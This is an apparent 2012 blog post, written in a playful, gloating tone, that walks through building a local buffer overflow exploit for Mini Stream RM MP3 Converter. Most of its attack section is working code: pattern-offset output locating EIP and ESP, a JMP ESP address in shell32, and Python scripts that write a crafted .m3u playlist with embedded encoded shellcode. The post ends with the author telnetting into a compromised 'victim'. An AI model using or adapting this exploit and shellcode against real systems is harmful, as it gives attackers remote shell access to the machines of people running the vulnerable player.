Sunday, 12 February 2012

Exploitation: local exploit for MP3 Converter

Now I try again to buffer overflow RM MP3. In this step, to check the buffer, I use 3 scripts to build the buffer: the first makes a 10000-character string, the second 20000 characters, the third 30000 characters. I will try them one by one to find out how many characters I need to overflow RM MP3.
In this job I use:
OllyDBG
Mini Stream RM MP3 Converter
an exploit written by myself
the buffer file, made by myself
OK, let's begin trying to overflow. Starting with 10000 characters: no overflow :'(. Second try, 20000 characters: yupp, overflow! Try again with 30000 characters: yupp, overflow again, boom boom overflow.


Now I search for how many bytes it takes to overwrite EIP. I create a 20000-character pattern string to find out how many bytes are needed to reach EIP and ESP. Yupp, got it, boom, crash again :D. Now we take the EIP and ESP values. EIP:
root@cupenk:/pentest/exploits/framework/tools# ./pattern_offset.rb 0x36695735 20000
17417 <=
ESP:
root@cupenk:/pentest/exploits/framework/tools# ./pattern_offset.rb i8W 20000
17425
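To reproduce the two offsets above without the framework, here is an added example (not the author's code) that re-implements the cyclic pattern used by pattern_create.rb and pattern_offset.rb; it assumes the standard Metasploit pattern order (uppercase, lowercase, digit) and that the crashed register holds 4 pattern bytes loaded little-endian from the stack:

```python
#!/usr/bin/env python3
# Added example: minimal re-implementation of the Metasploit cyclic pattern,
# used in crash triage to map a register value back to an offset in the
# input. Reproduces the write-up's results: EIP at 17417, ESP at 17425
# for a 20000-byte pattern. Assumed to match pattern_create.rb's ordering.
import string
import struct

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length):
    """Build the non-repeating 'Aa0Aa1...Zz9' pattern, cut to `length` bytes.

    Triplet i is (upper, lower, digit); the digit changes fastest, then the
    lowercase letter, then the uppercase letter, so the pattern is unique for
    26 * 26 * 10 * 3 = 20280 bytes, which covers the 20000 used above.
    """
    out = []
    for i in range(length // 3 + 1):
        out.append(UPPER[(i // 260) % 26] + LOWER[(i // 10) % 26] + DIGITS[i % 10])
    return "".join(out)[:length]


def pattern_offset(value, length):
    """Locate `value` in a pattern of the given length.

    `value` is either the ASCII bytes seen at a register (e.g. 'i8W' at ESP)
    or the register value as an int (e.g. 0x36695735 in EIP), which is
    unpacked little-endian because that is how x86 read it from the stack.
    Returns the 0-based offset, or -1 when the value is not in the pattern.
    """
    if isinstance(value, int):
        value = struct.pack("<I", value).decode("latin-1")
    return pattern_create(length).find(value)


if __name__ == "__main__":
    print("EIP 0x36695735 ->", pattern_offset(0x36695735, 20000))  # 17417
    print("ESP 'i8W'      ->", pattern_offset("i8W", 20000))        # 17425
```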
OK, next I write the program again to find JMP ESP.
I will put the characters DADADADA at EIP.
Yupp... created...
#!/usr/bin/python
# Python 2 script: writes the test playlist that lands DADADADA in EIP
file="eip.m3u"
junk="http://"+"\x90" * 17417          # padding up to the saved EIP (offset 17417 from pattern_offset)
junk+="\xDA\xDA\xDA\xDA"               # marker bytes that should show up in EIP after the crash
out=open(file,'wb')                    # binary mode so the bytes are written unchanged
out.write(junk)
print ("success idiot")
out.close()

Now I will check what lands at ESP: gotcha, the CACACACACA bytes have landed at ESP :D
Now I will find a JMP ESP, in shell32. Yup, got it: JMP ESP at 7C9D30D7:
After checking, bingo, JMP ESP has been found. Now I will create the exploit.
For the exploit I use my payload from the previous exploitation.
#!/usr/bin/python
# Python 2 script: builds the playlist that triggers the overflow
file="exploit.m3u"
junk="http://"+"\x90" * 17417          # padding up to the saved EIP (offset 17417)
junk+="\xD7\x30\x9D\x7C"               # EIP = 0x7C9D30D7, the JMP ESP found above (little-endian)
junk+="\x90" * 32                      # short NOP sled before the payload that sits at ESP
junk+=("\x2b\xc9\xbe\x60\xbb\x9e\xe2\xda\xdf\xd9\x74\x24\xf4\x58\xb1\x51"
"\x83\xc0\x04\x31\x70\x0c\x03\x10\xb7\x7c\x17\x2c\xad\x6b\x95\x24"
"\xcb\x93\xd9\x4b\x4c\xe7\x4a\x97\xa9\x7c\xd7\xeb\x3a\xfe\xdd\x6b"
"\x3c\x10\x56\xc4\x26\x65\x36\xfa\x57\x92\x80\x71\x63\xef\x12\x6b"
"\xbd\x2f\x8d\xdf\x3a\x6f\xda\x18\x82\xba\x2e\x27\xc6\xd0\xc5\x1c"
"\x92\x02\x0e\x17\xff\xc0\x11\xf3\xfe\x3d\xcb\x70\x0c\x89\x9f\xd9"
"\x11\x0c\x4b\xe6\x05\x85\x02\x84\x71\x85\x75\x97\x4b\x6e\x11\x9c"
"\xef\xa0\x51\xe2\xe3\x4b\x15\xfe\x56\xc0\x96\xf6\xf6\xbf\x98\x48"
"\x09\xac\xf5\xab\xc3\x4a\xa5\x35\x84\xa1\x7b\xd1\x23\xb5\x49\x7e"
"\x98\xc6\x7e\xe8\xeb\xd4\x83\xd3\xbb\xd9\xaa\x7c\xb5\xc3\x35\x03"
"\x28\x03\xb8\x56\xd9\x16\x43\x88\x75\xce\xb2\xdd\x2b\xa7\x3b\xcb"
"\x67\x1b\x97\xa0\xd4\xd8\x44\x05\x88\x21\xba\xef\x46\xcf\x67\x89"
"\xc5\x66\x76\xc0\x82\xdc\x63\x9a\x95\x4a\x6b\x8c\x70\x65\xc2\x65"
"\x7a\x55\x8c\x21\x29\x78\xa4\x7e\xcd\x53\x65\xd5\xce\x8c\xe2\x30"
"\x79\xab\xba\xed\x85\x65\x6c\x45\x2e\xdf\x72\xb5\x5d\xb7\x6b\x4c"
"\xa4\x31\x23\x51\xfe\x97\x34\x7d\x99\x7d\xaf\x1b\x0e\xe1\x42\x6a"
"\x2b\x8f\xcc\x35\x9d\x9c\x64\x22\xb7\x58\xfe\x4e\x79\xa1\xf3\x24"
"\x84\x63\xd9\xc6\x3b\x48\xb2\xbb\xc6\xa8\x1f\x68\x9d\xa1\x2d\x90"
"\x51\x27\x2d\x19\xd2\xb7\x07\xba\x8d\x15\xf9\x6d\x63\xf0\xf8\xdc"
"\xd2\x51\xaa\x21\x04\x31\xe1\x04\xa0\x0c\xaa\x49\x7d\xfa\xb2\x4a"
"\xb5\x04\x9c\x3f\xed\x06\x9e\xfb\x76\x08\x77\x51\x88\x26\x10\xa5"
"\xfc\xc3\xbe\x16\xfe\x1a\xbf\x48")
out=open(file,'wb')                    # binary mode so the bytes are written unchanged
out.write(junk)
print ("success idiot")
out.close()
Bingo, crash, crash, crash. Now I will try to telnet to the victim:
Gotcha, let's dance, dance, dance, hahaa... done, done, done, under attack.
Success...

